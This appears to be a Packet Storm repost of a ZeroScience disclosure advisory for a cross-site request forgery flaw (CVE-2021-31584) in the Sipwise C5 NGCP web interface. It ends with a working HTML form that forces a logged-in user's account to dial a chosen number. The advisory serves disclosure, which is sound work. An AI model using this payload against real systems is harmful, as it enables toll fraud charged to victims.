exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sipwise C5 NGCP CSC Cross Site Request Forgery

Sipwise C5 NGCP CSC Cross Site Request Forgery
Posted Apr 23, 2021
Authored by LiquidWorm | Site zeroscience.mk

The Sipwise application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Versions affected include CE_m39.3.1 and below and NGCP www_admin version 3.6.7.

tags | exploit, web
advisories | CVE-2021-31584
SHA-256 | 7af65ecb81ce4b4c1a3d5b2e77c78c1b93a601f5b442985ac77bb97f00dc5731

Sipwise C5 NGCP CSC Cross Site Request Forgery

Change Mirror Download

Sipwise C5 NGCP CSC CSRF Click2Dial Exploit


Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
NGCP www_admin version 3.6.7

Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.

Desc: The application interface allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.

Tested on: Apache/2.2.22 (Debian)
Apache/2.2.16 (Debian)
nginx


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2021-5649
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5649.php

CVE ID: CVE-2021-31584
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31584


13.04.2021

--


<html>
<body>
<form action="https://10.0.1.7/call/click2dial" method="POST">
<input type="hidden" name="d" value="%2B3897031337" />
<input type="submit" value="Dial and charge!" />
</form>
</body>
</html>
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close